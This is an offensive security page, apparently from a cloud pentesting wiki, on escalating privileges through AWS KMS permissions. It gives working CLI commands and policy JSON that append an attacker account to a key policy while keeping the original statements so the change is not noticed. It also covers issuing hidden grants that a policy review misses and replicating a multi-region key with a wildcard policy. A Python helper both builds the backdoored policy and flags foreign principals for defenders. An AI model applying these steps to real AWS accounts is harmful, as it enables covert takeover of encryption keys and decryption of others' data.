# AWS - KMS Privesc

{{#include ../../../../banners/hacktricks-training.md}}

## KMS

For more info about KMS check:

{{#ref}}
../../aws-services/aws-kms-enum.md
{{#endref}}

### `kms:ListKeys`, `kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`)

With these permissions it's possible to modify the access permissions of the key so it can be used by other accounts or even by anyone. Because a KMS key has exactly one policy, `put-key-policy` replaces the whole document, so keep the original statements (at least the owning account's root statement) and append the attacker's principal; otherwise the legitimate admins are locked out and the change is noticed immediately:

```bash
aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json
```

policy.json:

```json
{
  "Version": "2012-10-17",
  "Id": "key-consolepolicy-3",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<origin_account>:root"
      },
      "Action": "kms:*",
      "Resource": "*"
    },
    {
      "Sid": "Allow all use",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<attackers_account>:root"
      },
      "Action": ["kms:*"],
      "Resource": "*"
    }
  ]
}
```

### `kms:CreateGrant`

It allows a principal to use a KMS key for the operations listed in the grant, without touching the key policy (so a review of the key policy alone won't reveal it):

```bash
aws kms create-grant \
    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
    --grantee-principal arn:aws:iam::123456789012:user/exampleUser \
    --operations Decrypt
```

> [!WARNING]
> A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)

> [!WARNING]
> Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.
> However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).
> For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token).

```bash
# Keep the grant token returned by create-grant (the grant must include the
# GenerateDataKey operation for the call below) and use it right away
token=$(aws kms create-grant --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
    --grantee-principal arn:aws:iam::123456789012:user/exampleUser \
    --operations GenerateDataKey --query GrantToken --output text)
aws kms generate-data-key \
    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
    --key-spec AES_256 \
    --grant-tokens $token
```

Note that it's possible to list the grants of a key with:

```bash
aws kms list-grants --key-id <value>
```

### `kms:CreateKey`, `kms:ReplicateKey`

With these permissions it's possible to replicate a multi-region KMS key into a different region with a different key policy. A replica shares the key material of the primary key, so anything encrypted with the primary can be decrypted with the replica, while the replica's policy is completely independent of the primary's.

So an attacker could abuse this to escalate their access to the key (by giving the replica a policy that trusts them, or anyone) and then use the replica. `--bypass-policy-lockout-safety-check` skips the check that the caller keeps admin access under the new policy:

```bash
aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.json
```

```json
{
    "Version": "2012-10-17",
    "Id": "key-consolepolicy-3",
    "Statement": [
        {
            "Sid": "Enable IAM User Permissions",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "kms:*",
            "Resource": "*"
        }
    ]
}
```
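The three techniques above (`PutKeyPolicy`, `CreateGrant`, `ReplicateKey`) all leave the same kind of trace: an Allow statement or a grant whose principal belongs to an account the key owner does not recognise, or the wildcard `*`. The following is an added example, not code from the original page: it builds the backdoored policy the way the `put-key-policy` section describes (original statements kept, attacker root appended) and then triages key policies and `list-grants` output for foreign principals. It works on the JSON the AWS CLI prints, so it runs offline; the account IDs, key IDs, ARNs and `TRUSTED_ACCOUNTS` are constructed sample values, not from the page.

```python
"""KMS key-policy / grant triage helpers (added example, not part of the page)."""
import json
import re

ACCOUNT_RE = re.compile(r"^arn:aws:iam::(\d{12}):")


def principals_of(statement):
    """All AWS principal strings in a statement ('*', a string, or a list)."""
    principal = statement.get("Principal", {})
    if principal == "*":
        return ["*"]
    aws = principal.get("AWS", []) if isinstance(principal, dict) else []
    return [aws] if isinstance(aws, str) else list(aws)


def account_of(principal):
    """Account ID behind a principal: '*' for wildcard, None if not an IAM ARN."""
    if principal == "*":
        return "*"
    if re.fullmatch(r"\d{12}", principal):      # bare account ID form
        return principal
    m = ACCOUNT_RE.match(principal)
    return m.group(1) if m else None


def foreign_principals(policy, trusted_accounts):
    """Allow statements whose principal is '*' or outside trusted_accounts.
    Returns [(Sid, principal), ...]."""
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        for p in principals_of(stmt):
            acct = account_of(p)
            if acct == "*" or acct not in trusted_accounts:
                findings.append((stmt.get("Sid", ""), p))
    return findings


def add_principal(policy, principal_arn, actions=("kms:*",)):
    """Attacker side of kms:PutKeyPolicy: a key has exactly one policy, so keep
    the existing statements and append an Allow for the new principal."""
    new_policy = json.loads(json.dumps(policy))  # deep copy, original untouched
    new_policy.setdefault("Statement", []).append({
        "Sid": "Allow all use",
        "Effect": "Allow",
        "Principal": {"AWS": principal_arn},
        "Action": list(actions),
        "Resource": "*",
    })
    return new_policy


def foreign_grants(list_grants_output, trusted_accounts):
    """Grants (shape of `aws kms list-grants` JSON) whose grantee is outside
    trusted_accounts. Returns [(GrantId, GranteePrincipal, operations), ...]."""
    findings = []
    for g in list_grants_output.get("Grants", []):
        grantee = g.get("GranteePrincipal", "")
        if account_of(grantee) not in trusted_accounts:
            findings.append((g["GrantId"], grantee, tuple(g.get("Operations", []))))
    return findings


# Constructed sample data (hypothetical account IDs and ARNs).
OWNER = "111111111111"
ATTACKER = "222222222222"
TRUSTED_ACCOUNTS = {OWNER}

ORIGINAL_POLICY = {
    "Version": "2012-10-17",
    "Id": "key-consolepolicy-3",
    "Statement": [{
        "Sid": "Enable IAM User Permissions",
        "Effect": "Allow",
        "Principal": {"AWS": f"arn:aws:iam::{OWNER}:root"},
        "Action": "kms:*",
        "Resource": "*",
    }],
}

SAMPLE_GRANTS = {  # constructed to mirror `aws kms list-grants` output
    "Grants": [
        {"GrantId": "0123", "GranteePrincipal": f"arn:aws:iam::{OWNER}:role/app",
         "Operations": ["Decrypt"]},
        {"GrantId": "4567", "GranteePrincipal": f"arn:aws:iam::{ATTACKER}:user/exampleUser",
         "Operations": ["Decrypt", "GenerateDataKey"]},
    ]
}

if __name__ == "__main__":
    backdoored = add_principal(ORIGINAL_POLICY, f"arn:aws:iam::{ATTACKER}:root")
    print(json.dumps(backdoored, indent=2))           # contents for /tmp/policy.json
    print(foreign_principals(backdoored, TRUSTED_ACCOUNTS))
    print(foreign_grants(SAMPLE_GRANTS, TRUSTED_ACCOUNTS))
```

On the defensive side, feed the helpers the output of `aws kms get-key-policy --output text` (parsed with `json.loads`) and `aws kms list-grants` for every key in every region; a replica created with the `ReplicateKey` technique shows up as a key in a region the owner never used, with a `*` principal that `foreign_principals` flags.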

### `kms:Decrypt`

This permission allows using a key to decrypt data that was encrypted under it (secrets, data keys of envelope-encrypted objects, etc.). For more information check:

{{#ref}}
../../aws-post-exploitation/aws-kms-post-exploitation/README.md
{{#endref}}

{{#include ../../../../banners/hacktricks-training.md}}